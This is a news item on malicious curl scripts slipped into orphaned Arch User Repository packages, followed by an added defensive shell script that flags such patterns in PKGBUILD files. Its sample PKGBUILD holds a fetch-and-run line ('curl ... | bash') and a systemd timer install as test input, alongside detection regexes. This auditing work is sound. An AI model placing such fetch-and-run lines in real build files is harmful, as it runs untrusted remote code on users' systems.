Headlines
2018-07-10
AUR packages compromised

People who run Arch Linux, or one of its many derivatives, received a reminder last week that while the Arch User Repository (AUR) is a convenient way to access a large number of software packages, the packages in that repository can come from anywhere and should not be blindly trusted. Sensors Tech Forum reports: "Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project's user-maintained AUR packages (which stands for Arch User Repository) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions. The security investigation shows that a malicious user with the nickname xeactor modified on June 7 an orphaned package (software without an active maintainer) called acroraed. The changes included a curl script that downloads and runs a script from a remote site. This installs persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." Most Linux distributions have optional add-on repositories where community members can upload scripts or packages. These third-party items should be audited before being installed.
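
One way to start the audit recommended above, as an added example that is not part of the original article or the Sensors Tech Forum report: a shell check that flags the pattern described in the quote (a curl download that is run as a script, plus systemd changes) in a PKGBUILD or .install file before building. The function names, the regex heuristics and the sample package are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the article): static pre-build check of AUR build files.
# The three heuristics below are assumptions chosen for illustration.

# Print "file:line:text  <- label" for each non-comment line matching a regex.
# $1 = label, $2 = extended regex, $3 = file
scan_rule() {
    grep -nE -- "$2" "$3" | grep -vE '^[0-9]+:[[:space:]]*#' |
        awk -v f="$3" -v l="$1" '{ print f ":" $0 "  <- " l }'
}

# Apply every rule to every file named on the command line.
scan_files() {
    for _f in "$@"; do
        scan_rule 'fetch piped to shell' \
            '(curl|wget)[^|;]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([^[:alnum:]_]|$)' "$_f"
        scan_rule 'fetched script executed' \
            '(eval|(ba|z|da)?sh([[:space:]]+-c)?)[[:space:]]+"?(\$\(|<\()[[:space:]]*(curl|wget)' "$_f"
        scan_rule 'systemd change, review' \
            'systemctl[[:space:]].*(enable|start|daemon-reload)|/(etc|usr/lib)/systemd/' "$_f"
    done
}

# Print findings and return 1 if any line was flagged, otherwise return 0.
audit_pkgbuild() {
    _findings=$(scan_files "$@")
    [ -z "$_findings" ] && return 0
    printf '%s\n' "$_findings"
    return 1
}

# Constructed sample PKGBUILD (hypothetical package, placeholder URLs).
write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
pkgname=example-viewer
pkgver=1.0
source=("https://example.invalid/example-viewer-$pkgver.tar.gz")
# curl https://example.invalid/x | bash   (comment only, not flagged)
package() {
    curl -s https://example.invalid/setup | bash
    install -Dm644 helper.timer "$pkgdir/usr/lib/systemd/system/helper.timer"
    install -Dm755 viewer "$pkgdir/usr/bin/viewer"
}
EOF
}

sample=$(mktemp)
write_sample_pkgbuild "$sample"
audit_pkgbuild "$sample" || echo "Review the flagged lines before running makepkg."
rm -f "$sample"
```

A clean result only means these three patterns were not found; the PKGBUILD and any .install file still need to be read, and a systemd hit is a prompt for review because legitimate packages also ship unit files.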